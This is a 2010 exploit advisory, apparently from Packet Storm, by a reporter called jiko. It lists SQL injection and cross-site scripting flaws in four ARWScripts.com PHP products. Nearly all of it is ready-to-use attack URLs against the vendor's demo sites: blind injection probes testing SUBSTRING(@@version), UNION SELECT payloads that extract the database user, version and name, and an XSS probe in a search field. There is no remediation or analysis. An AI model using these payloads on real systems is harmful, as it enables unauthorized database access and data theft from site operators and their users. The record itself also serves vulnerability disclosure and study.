ARWScripts.com Products Cross Site Scripting / SQL Injection

2010-02-10T00:00:00
ID PACKETSTORM:86110
Type packetstorm
Reporter jiko
Modified 2010-02-10T00:00:00

Description

                                        
                                            `------------  
1  
----------[exploit Debut]  
[Remote Blind SQL Injection Vulnerability]  
----------[Script Info]  
  
Moi : JIKO  
Site : No-exploit.Com  
Email : mm :( Moghla9 Ferme Closed  
  
----------[Script Info]  
  
Site:http : http://arwscripts.com  
Product : http://www.arwscripts.com/file-hosting-script.html  
Demo : http://arwscripts.com/demos/filehost  
Prix : $29  
----------[exploit Info]  
  
1]~  
http://arwscripts.com/demos/filehost/view-file.html?file=6615+AND+SUBSTRING(@@version,1,1)=4 [No]  
http://arwscripts.com/demos/filehost/view-file.html?file=6615+AND+SUBSTRING(@@version,1,1)=5 [OUI]  
2]~  
http://arwscripts.com/demos/filehost/showfile-6615+AND+SUBSTRING(@@version,1,1)=4/m0.gif [No]  
http://arwscripts.com/demos/filehost/showfile-6615+AND+SUBSTRING(@@version,1,1)=5/m0.gif [OUI]  
  
----------[exploit Fin]  
------------------------  
2  
----------[exploit Debut]  
[Remote SQL Injection Vulnerability / XSS]  
----------[Script Info]  
  
Moi : JIKO  
Site : No-exploit.Com  
Email : mm :( Moghla9 Ferme Closed  
  
----------[Script Info]  
  
Site:http : http://arwscripts.com  
Product : http://www.arwscripts.com/joke-site-script.html  
Demo : http://www.arwscripts.com/demos/jokessite/  
Prix : $39  
----------[exploit Info]  
  
1]~[Sql]  
http://www.arwscripts.com/demos/jokessite/view--3655557%20union%20select%200,user(),version(),database(),4,5,6,7,8,version(),10-a_guy_gets_home_early_from_work_and_hears_strange_.html  
  
2]~[Xss]  
http://www.arwscripts.com/demos/jokessite/search.html?c=<br>JIKO  
  
----------[exploit Fin]  
---------------------------------  
3  
----------[exploit Debut]  
[Remote Blind SQL Injection Vulnerability / SQl]  
----------[Script Info]  
  
Moi : JIKO  
Site : No-exploit.Com  
Email : mm :( Moghla9 Ferme Closed  
  
----------[Script Info]  
  
Site:http : http://arwscripts.com  
Product : http://www.arwscripts.com/image-hosting-script.html  
Demo : http://www.arwscripts.com/demos/imagehost/  
Prix : $39  
----------[exploit Info]  
  
1]~[Sql]  
http://arwscripts.com/demos/imagehost/showpic-12685 [SQL]/m0.gif [No]  
2]~[Blind]  
http://arwscripts.com/demos/imagehost/showpic-12685+AND+SUBSTRING(@@version,1,1)=4/m0.gif [No]  
http://arwscripts.com/demos/imagehost/showpic-12685+AND+SUBSTRING(@@version,1,1)=5/m0.gif [OUI]  
  
----------[exploit Fin]  
-------------------  
4  
----------[exploit Debut]  
[Remote Blind SQL Injection Vulnerability / SQl]  
----------[Script Info]  
  
Moi : JIKO  
Site : No-exploit.Com  
Email : mm :( Moghla9 Ferme Closed  
  
----------[Script Info]  
  
Site:http : http://arwscripts.com  
Product : http://www.arwscripts.com/gallery-script-lite.html  
Demo : http://www.arwscripts.com/demos/fontssite/  
Prix : $39  
----------[exploit Info]  
  
1]~[Sql]  
http://www.arwscripts.com/demos/fontssite/font-null union select user(),user(),user(),version(),database()-abecedarian.html  
----------[exploit Fin]  
  
`